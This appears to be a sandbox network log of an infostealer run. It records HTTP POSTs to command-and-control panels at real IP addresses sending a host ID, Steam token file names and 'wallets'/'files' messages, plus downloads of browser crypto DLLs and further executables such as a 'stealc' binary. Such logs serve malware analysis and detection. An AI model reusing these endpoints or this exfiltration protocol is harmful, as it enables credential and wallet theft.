Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 2d 2d 0d 0a Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file"------EGCBFIEHIEGCAAAKKKKE--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 2d 2d 0d 0a Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file"------EGCBFIEHIEGCAAAKKKKE--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAAHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 2d 2d 0d 0a Data Ascii: ------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="file"------AEGIJKEHCAKFCAKFHDAA--
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDAHost: 85.28.47.31Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHDHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 2d 2d 0d 0a Data Ascii: ------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="message"wallets------BGCAAFHIEBKJKEBFIEHD--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDAHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 2d 2d 0d 0a Data Ascii: ------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="message"ybncbhylepme------KFHCAEGCBFHJDGCBFHDA--
Source: global traffic	HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/enter.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIECHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 2d 2d 0d 0a Data Ascii: ------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="file"------GIECFIEGDBKJKFIDHIEC--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJDHost: 85.28.47.31Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 2d 2d 0d 0a Data Ascii: ------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="message"files------AKKECAFBFHJDGDHIEHJD--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 2d 2d 0d 0a Data Ascii: ------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="message"wkkjqaiaxkhb------FHDAFIIDAKJDGDHIDAKJ--
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /inc/PharmaciesDetection.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000025001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /inc/buildred.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFCGIIIJDBGCBGIDGIHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 43 47 49 49 49 4a 44 42 47 43 42 47 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 42 42 30 41 46 41 33 31 36 44 33 33 39 32 32 35 39 37 34 39 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 43 47 49 49 49 4a 44 42 47 43 42 47 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 43 47 49 49 49 4a 44 42 47 43 42 47 49 44 47 49 2d 2d 0d 0a Data Ascii: ------GDBFCGIIIJDBGCBGIDGIContent-Disposition: form-data; name="hwid"A1BB0AFA316D3392259749------GDBFCGIIIJDBGCBGIDGIContent-Disposition: form-data; name="build"sila------GDBFCGIIIJDBGCBGIDGI--
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000027001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 33 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000003002&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /inc/build2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000028001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
